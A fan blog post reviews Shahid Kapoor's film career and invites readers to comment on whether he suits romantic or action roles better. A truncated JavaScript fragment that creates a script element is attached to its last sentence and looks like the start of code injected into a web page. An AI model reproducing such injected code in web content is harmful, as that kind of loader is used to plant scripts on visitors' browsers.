Remember that song? Aankhon mai tera hi chehra by the Aryans? Remember that cute little kid with dimples on his face crushing on a girl? Yep, that cute boy was Shahid Kapoor. The song had a tragic ending for him but thankfully we can’t say the same about his career.
Born to theater personalities, Pankaj Kapur and Neelima Azeem, Shahid Kapoor was always interested in making a career out of Bollywood. He started off by appearing in music videos and advertisements. His first appearance in Bollywood was with Subash Ghai’s Taal, where is was a background dancer. After this, he took a break and concentrated on his debut movie. Two years later, we saw a very different boy in Ishq Vishk flirting with not one but two girls.
After Ishq Vishk, we all tagged him as the romantic lover boy and didn’t want to see him as anything else. He was like the younger version of Shahrukh Khan and all the school-college girls were drooling over him. Yes, his first movie indeed had a powerful impact. His next movie, Fida magnified our love for him. The romantic thriller was a pretty awesome. It’s a shame that it didn’t do well. Shahid Kapoor didn’t lose hope and appeared in movies like Dil Maange More, Deewane Huye Paagal, Vaah! Life Ho Toh Aisi! and finally Shikhar. The critics loved him and his performances but sadly, the audiences weren’t on the same page.
Many movies later, his real potential was seen in Jab We Met. There was something about the movie that EVERYONE loved. Don’t know what it was, but it sure was a turning point in his career. After Jab We Met we knew for sure that he could only be a romantic hero and nothing else. Not in a derogatory way but we were pretty sure that he could win hearts only by romancing and not by kicking ass.
Two years later, he surprised us with Kaminey. Shahid Kapoor, riding a horse, bare chested was a scene to watch and after watching Kaminey, we were dumbfounded. It isn’t everyday that you get to watch an actor transform himself so much. Around the same time Kareena went from being healthy to being anorexic. Were the competing? On who handles break up best? Guess we will never know that!
Anyway, after watching Kaminey over and over again, we changed our opinion about Shahid. After just one movie, Shahid went from being a romantic Romeo to crazy Samurai. And I must confess! I loved him in both the avatars. After watching R Rajkumar, I became his biggest fan! Loved the way he played both the romantic guy and the action hero. Like he says, Pyaar, pyaar, pyaar aur Maaaaar, maar maar! Uff!!!
What do you guys think? Which role suits him better? The romantic lover or the action boy? Do comment and give your views! We’d love to know!var d=document;var s=d.createElement(‘script’);
